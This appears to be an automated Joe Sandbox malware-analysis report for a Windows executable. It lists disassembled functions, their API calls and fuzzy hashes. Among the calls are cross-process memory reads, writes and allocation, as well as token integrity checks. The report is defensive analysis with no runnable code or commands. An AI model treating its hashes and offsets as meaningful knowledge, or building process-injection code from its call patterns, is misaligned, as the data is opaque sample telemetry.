                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: a6b69becad45e5714b87240b4991ac4134bf2bb3d1a7385c8af183d264e783b0
                                                      • Instruction ID: df91fbbeffaab14d111be54494cd836afe8fc75fdd480450c8311a426c9aa5c5
                                                      • Opcode Fuzzy Hash: a6b69becad45e5714b87240b4991ac4134bf2bb3d1a7385c8af183d264e783b0
                                                      • Instruction Fuzzy Hash: 0801FE3250590467C65227756C87D2B3659ABD37B7B244319FF25A2192DE289C0D7160
                                                      Function 00F8000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?,?,?,00F8035E), ref: 00F8002B
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?,?), ref: 00F80046
                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?,?), ref: 00F80054
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?), ref: 00F80064
                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F7FF41,80070057,?,?), ref: 00F80070
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      • Opcode ID: defde1fc910db0b33cdfe50155bfe5cd5ed9f9b57ec05eb903f19d1bf9d1ffc6
                                                      • Instruction ID: 7f70bc69afeded64db4d8b11e22a8a64a168fc58e120c6e4ba06bb765e098545
                                                      • Opcode Fuzzy Hash: defde1fc910db0b33cdfe50155bfe5cd5ed9f9b57ec05eb903f19d1bf9d1ffc6
                                                      • Instruction Fuzzy Hash: 9D01AD72A00208BFDB516F68DC84BEB7AEDEF447A2F544224F905D6210EB71DD44BBA0
                                                      Function 00F8E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00F8E997
                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00F8E9A5
                                                      • Sleep.KERNEL32(00000000), ref: 00F8E9AD
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00F8E9B7
                                                      • Sleep.KERNEL32 ref: 00F8E9F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: dabda5f3313947edc3c52f31b3fb5b1e014770a4ce2d976e1c6dfc20eb45fc0f
                                                      • Instruction ID: 513b1be34442cf7a3466fc27499b09ead708957d237168f37322d8b6441f3a56
                                                      • Opcode Fuzzy Hash: dabda5f3313947edc3c52f31b3fb5b1e014770a4ce2d976e1c6dfc20eb45fc0f
                                                      • Instruction Fuzzy Hash: F8019E31D0162DDBCF00AFE9DC89AEEBB78FF09311F000646E542B2241CB709550EBA1
                                                      Function 00F810F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F81114
                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F81120
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F8112F
                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F81136
                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F8114D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 842720411-0
                                                      • Opcode ID: c290f55ca697fab31355cda462a5573ffc5d27aa8cac6e60a63a6e2f280561cb
                                                      • Instruction ID: 44fd36452db0b13f1cceae11547c1c14c3e6f99bbf04e7f6795d1188367d26af
                                                      • Opcode Fuzzy Hash: c290f55ca697fab31355cda462a5573ffc5d27aa8cac6e60a63a6e2f280561cb
                                                      • Instruction Fuzzy Hash: 3A016D75500609BFDB115F65DC8DAAB3B6EFF85360B210515FA45D3360DA31DC00AFA0
                                                      Function 00F80FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F80FCA
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F80FD6
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F80FE5
                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F80FEC
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F81002
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: d550bd87a0c877c6d0cee40b708d4b41df6523d8e66238c8fde6bc99aa33f45a
                                                      • Instruction ID: fbc93b2f0bcdd080ac393199d98b5940c51e678a3558ffeb9e8043f56a6ad571
                                                      • Opcode Fuzzy Hash: d550bd87a0c877c6d0cee40b708d4b41df6523d8e66238c8fde6bc99aa33f45a
                                                      • Instruction Fuzzy Hash: 3DF0A975200309ABDB212FA99C89F973BADFF89762F100525FA49D6251CA30DC40AEA0
                                                      Function 00F81014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F8102A
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F81036
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F81045
                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F8104C
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F81062
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: 3e6842303f75ab764c22a03d198685a2ea34e2fffeb7db10e111fa855bc51c1d
                                                      • Instruction ID: 13553e8ec5bd50c16e35c798b8744035a98f7f44a17262254ea50f9b9d051276
                                                      • Opcode Fuzzy Hash: 3e6842303f75ab764c22a03d198685a2ea34e2fffeb7db10e111fa855bc51c1d
                                                      • Instruction Fuzzy Hash: 31F06D75200309EBDB216FA9EC89F973BADFF89761F100525FA45D7251CA70D841AFA0
                                                      Function 00F9030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CloseHandle.KERNEL32(?,?,?,?,00F9017D,?,00F932FC,?,00000001,00F62592,?), ref: 00F90324
                                                      • CloseHandle.KERNEL32(?,?,?,?,00F9017D,?,00F932FC,?,00000001,00F62592,?), ref: 00F90331
                                                      • CloseHandle.KERNEL32(?,?,?,?,00F9017D,?,00F932FC,?,00000001,00F62592,?), ref: 00F9033E
                                                      • CloseHandle.KERNEL32(?,?,?,?,00F9017D,?,00F932FC,?,00000001,00F62592,?), ref: 00F9034B
                                                      • CloseHandle.KERNEL32(?,?,?,?,00F9017D,?,00F932FC,?,00000001,00F62592,?), ref: 00F90358
                                                      • CloseHandle.KERNEL32(?,?,?,?,00F9017D,?,00F932FC,?,00000001,00F62592,?), ref: 00F90365
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: c9f7adb56772d421d776e82ad800532824b3ff5ac895bd9a30ff5e1f4b06fbe6
                                                      • Instruction ID: 44818f5dfce83d3e7adf38493f2388a5a720beaad9cd25a2584d8c7fe9b8cf95
                                                      • Opcode Fuzzy Hash: c9f7adb56772d421d776e82ad800532824b3ff5ac895bd9a30ff5e1f4b06fbe6
                                                      • Instruction Fuzzy Hash: 8B01AE72800B159FDB30AF66D880812FBF9BF603253158A3FD19652931CBB1A958EF80
                                                      Function 00F5D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00F5D752
                                                        • Part of subcall function 00F529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000), ref: 00F529DE
                                                        • Part of subcall function 00F529C8: GetLastError.KERNEL32(00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000,00000000), ref: 00F529F0
                                                      • _free.LIBCMT ref: 00F5D764
                                                      • _free.LIBCMT ref: 00F5D776
                                                      • _free.LIBCMT ref: 00F5D788
                                                      • _free.LIBCMT ref: 00F5D79A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: adaf0d269d3810dd23b3cec05819866062062e277abd58ea8403a823ad99cd02
                                                      • Instruction ID: 3bd153d0c09343c57aded1db6267336194637d3354adea37ccc882ef3ca36ccf
                                                      • Opcode Fuzzy Hash: adaf0d269d3810dd23b3cec05819866062062e277abd58ea8403a823ad99cd02
                                                      • Instruction Fuzzy Hash: 82F09C3290124CAB8675EB58FDC1C5A7BEDBB493227940C05FE44E7502C734FC84B6A0
                                                      Function 00F85C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00F85C58
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F85C6F
                                                      • MessageBeep.USER32(00000000), ref: 00F85C87
                                                      • KillTimer.USER32(?,0000040A), ref: 00F85CA3
                                                      • EndDialog.USER32(?,00000001), ref: 00F85CBD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: 6721d525c31a85c25ed08c690acd215760668b67f5c576e7b309aa3a07d0a628
                                                      • Instruction ID: 27bd008debc1fd2d6b7cb4601b69fe4e587394b55137af1b5663964477e2afb5
                                                      • Opcode Fuzzy Hash: 6721d525c31a85c25ed08c690acd215760668b67f5c576e7b309aa3a07d0a628
                                                      • Instruction Fuzzy Hash: A4018B705007049BEB216B20DD8EFE677B9BB01F05F001659A587A14E1DBF45944AF90
                                                      Function 00F522A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00F522BE
                                                        • Part of subcall function 00F529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000), ref: 00F529DE
                                                        • Part of subcall function 00F529C8: GetLastError.KERNEL32(00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000,00000000), ref: 00F529F0
                                                      • _free.LIBCMT ref: 00F522D0
                                                      • _free.LIBCMT ref: 00F522E3
                                                      • _free.LIBCMT ref: 00F522F4
                                                      • _free.LIBCMT ref: 00F52305
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 64fef65f50a6c4f59dcc51946c5ff3abe7590c0d586ffff2db9eacc4d8dcefba
                                                      • Instruction ID: cecc65eef3f0bca74eb32774dab1e1ee1c76922b0ba55132db75c280e6e51045
                                                      • Opcode Fuzzy Hash: 64fef65f50a6c4f59dcc51946c5ff3abe7590c0d586ffff2db9eacc4d8dcefba
                                                      • Instruction Fuzzy Hash: 3DF054748001189B8652AF9CBC418693B78FF19762B00070AF910E63B2CB350516FFE4
                                                      Function 00F395C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EndPath.GDI32(?), ref: 00F395D4
                                                      • StrokeAndFillPath.GDI32(?,?,00F771F7,00000000,?,?,?), ref: 00F395F0
                                                      • SelectObject.GDI32(?,00000000), ref: 00F39603
                                                      • DeleteObject.GDI32 ref: 00F39616
                                                      • StrokePath.GDI32(?), ref: 00F39631
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: e593eda1367142d02538f0983134ae7f11d7f181a234083ea349578013b8fe7d
                                                      • Instruction ID: e2c178f418655d677b1194d61b8c83fceb9985cdb4e007d2ada9f2a7a6605503
                                                      • Opcode Fuzzy Hash: e593eda1367142d02538f0983134ae7f11d7f181a234083ea349578013b8fe7d
                                                      • Instruction Fuzzy Hash: 3FF0F63140A20CEBDB226F69ED5877A3B69BF10372F048214E565950F0CBF08995FFA0
                                                      Function 00F50F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: __freea$_free
                                                      • String ID: a/p$am/pm
                                                      • API String ID: 3432400110-3206640213
                                                      • Opcode ID: 971ec30d16c27e6898e6ae6367c58ae54cee3c9265ebbc24fe85226c3d226cbc
                                                      • Instruction ID: 47a0c3d582c13332da0a3a5a3dc00f48007af0333cec012988a7e7a8b2cc0b04
                                                      • Opcode Fuzzy Hash: 971ec30d16c27e6898e6ae6367c58ae54cee3c9265ebbc24fe85226c3d226cbc
                                                      • Instruction Fuzzy Hash: 3AD10532D00206DADB249F68C865BFAB7B4FF06722F140159EF019BA51D375BD88EB91
                                                      Function 00FA7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F40242: EnterCriticalSection.KERNEL32(00FF070C,00FF1884,?,?,00F3198B,00FF2518,?,?,?,00F212F9,00000000), ref: 00F4024D
                                                        • Part of subcall function 00F40242: LeaveCriticalSection.KERNEL32(00FF070C,?,00F3198B,00FF2518,?,?,?,00F212F9,00000000), ref: 00F4028A
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                        • Part of subcall function 00F400A3: __onexit.LIBCMT ref: 00F400A9
                                                      • __Init_thread_footer.LIBCMT ref: 00FA7BFB
                                                        • Part of subcall function 00F401F8: EnterCriticalSection.KERNEL32(00FF070C,?,?,00F38747,00FF2514), ref: 00F40202
                                                        • Part of subcall function 00F401F8: LeaveCriticalSection.KERNEL32(00FF070C,?,00F38747,00FF2514), ref: 00F40235
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                      • String ID: 5$G$Variable must be of type 'Object'.
                                                      • API String ID: 535116098-3733170431
                                                      • Opcode ID: 5d41dc07a6ab18535b47dd244f6f4752abe41968d94a009452c7df4f2f850831
                                                      • Instruction ID: 716cbaff09e90b1bf95c5c33c9f2a8937432a779966992a204b619762e1ba530
                                                      • Opcode Fuzzy Hash: 5d41dc07a6ab18535b47dd244f6f4752abe41968d94a009452c7df4f2f850831
                                                      • Instruction Fuzzy Hash: F3919CB5A04209EFCB04EF54DC90DBDB7B1BF4A310F148059F8069B2A2DB75AE45EB61
                                                      Function 00F82716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F8B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F821D0,?,?,00000034,00000800,?,00000034), ref: 00F8B42D
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F82760
                                                        • Part of subcall function 00F8B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F821FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00F8B3F8
                                                        • Part of subcall function 00F8B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00F8B355
                                                        • Part of subcall function 00F8B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F82194,00000034,?,?,00001004,00000000,00000000), ref: 00F8B365
                                                        • Part of subcall function 00F8B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F82194,00000034,?,?,00001004,00000000,00000000), ref: 00F8B37B
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F827CD
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F8281A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: 5bb41147867b875dd3121623eec1eeb2720394277af8ff18388fe975d7a75f9b
                                                      • Instruction ID: c4e3b2c323673c00e176b0e830fbaad1fd39fd192c1129ae56e47b034c750646
                                                      • Opcode Fuzzy Hash: 5bb41147867b875dd3121623eec1eeb2720394277af8ff18388fe975d7a75f9b
                                                      • Instruction Fuzzy Hash: CE411B72900218BFDB10EFA4CD86AEEBBB8AF09710F104095FA55B7181DB746E45DBA1
                                                      Function 00F5172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\0XLuA614VK.exe,00000104), ref: 00F51769
                                                      • _free.LIBCMT ref: 00F51834
                                                      • _free.LIBCMT ref: 00F5183E
                                                      Strings
                                                      Memory Dump Source
